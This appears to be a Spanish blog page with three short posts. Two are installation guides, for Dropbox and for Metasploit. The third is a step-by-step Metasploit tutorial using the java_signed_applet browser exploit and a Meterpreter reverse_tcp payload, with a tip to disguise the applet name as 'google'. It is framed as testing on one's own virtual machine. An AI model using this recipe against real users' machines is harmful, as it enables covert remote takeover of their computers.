jueves, 3 de enero de 2013

Dropbox

Os voy a hablar de dropbox, es una herramienta que últimamente se está poniendo muy de moda en universidades españolas, aunque ya lleva bastante tiempo, y muchos ya lo conocíamos, pondré el método para instalarlo.

En una terminal ponemos:

sudo apt-get install dropbox

Yo sinceramente prefiero descargarlo desde la página oficial, porque no me da tanto follón, de que si no es la última versión y cosas similares, así además, con este enlace ganáis espacio adicional gratis! Así salimos todos ganando :).


Un saludo.








Publicado por en No hay comentarios:
Etiquetas:

Metasploit

Bien aquí os explicaré como usar metasploit.

 Lo primero de todo abrimos una terminal y ponemos:

 sudo msfconsole

Este programa usa exploits, así que los usaremos para acceder a la victima, que en este caso, seremos nosotros a modo de prueba, si teneis otro ordenador lo podréis usar, o sino con una máquina virtual.

Comencemos, el exploit es el siguiente:

use exploit/multi/browser/java_signed_applet

Ahora estamos usando ese exploit, que está presente en muchas aplicaciones web.
Nombraremos el applet, escribiendo:

set APPLETNAME google

El nombre del applet puede ser cualquier otro, pero si ponéis este nombre será menos sospechoso.
Ahora crearemos el servidor al que se conectará la víctima, que es nuestra dirección IP.
Para saber nuestra IP, abrimos otra terminal y escribimos:

sudo ifconfig

Yo estoy conectado a wlan0, así que mi IP es 192.168.1.41
Volvemos a la terminal del metasploit, y escribimos:

set SRVHOST 192.168.1.41

Ahora escribimos el puerto:

set SRVPORT 80

La ruta:

set URIPATH /

Ahora cargamos el payload:

set payload windows/meterpreter/reverse_tcp

Ponemos el host local, nuestra IP:

set LHOST 192.168.1.41


Ahora lanzamos el exploit:

exploit


Y listo, en el otro ordenador o en la maquina virtual, escribid la dirección IP en vuestro navegador, y ya tendréis control total. Os saldrá java preguntándoos si queréis ejecutar.

Y seguidamente os saldrá este mensaje si todo ha salido bien:

Meterpreter opened in session 1 O algo similar, y lo que tenéis que hacer es escribir:

sessions -i 1

O el número de sesión que os indique meterpreter, una vez aquí ya podéis trastear el ordenador, son comandos de windows básicos.

shutdown, reboot, regshot....

Y muchos otros, tenéis todas las opciones en el programa, es ir trasteando un poco, hasta que os aclaréis.

Esto lo he aprendido, viendo diversas páginas webs, videos y demás. No me responsabilizo del uso que le déis.


Publicado por en No hay comentarios:
Etiquetas:

miércoles, 2 de enero de 2013

Instalación Metasploit

Primero de todo Feliz Año 2013!!

Bueno, pues os voy a presentar un programita, que lo encuentro bastante útil, se trata de Metasploit, es un programa que contiene "exploits". Los exploits son como aplicaciones que nos ayudarán a hacer una serie de cosas la mar de interesantes.

Lo primero de todo es descargarnos el programa de su página web:


Nos descargamos nuestra versión y instalamos.

Lo instalamos mediante la terminal. El nombre del archivo que yo descargué era así:

metasploit-latest-linux-x64-installer.run 

Por tanto en la terminal escribimos:

Luego lo instalamos:

sudo ./metasploit-latest-linux-x64-installer.run 

Esperamos unos instantes a que se instale, y luego nos preguntará que si queremos hacer un directorio para el programa, contestamos que SI, y luego actualizará de internet, contestamos SI otra vez.

Luego nos tendremos que registrar, es gratuito así que no pasa nada.
Antes de empezar a manejarlo tendremos que instalar unas librerias, si no las tenéis ya instaladas.

sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby
irb ri rubygems subversion build-essential ruby-dev libpcap-dev

Y listo ya lo tendremos instalado y listo para funcionar, comprobamos que todo esta bien:

sudo msfconsole

Tardará un poco al principio así que tranquilos.



 
Publicado por en No hay comentarios:
Etiquetas:
Suscribirse a: Entradas (Atom)